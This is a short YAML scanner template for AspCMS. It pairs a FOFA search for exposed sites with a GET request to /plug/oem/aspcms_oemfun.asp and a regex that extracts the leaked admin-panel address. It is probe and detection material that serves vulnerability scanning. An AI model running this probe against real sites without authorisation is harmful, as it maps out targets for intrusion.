product: AspCMS
vName: AspCMS 逻辑错误导致后台地址泄露
type: 信息泄露
vID: [ ]
level: 1
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="ASPCMS"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /plug/oem/aspcms_oemfun.asp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - top.location.href='(.*?)';
            logic: and
          regex:
            value:
              - top.location.href='(.*?)';
            logic: and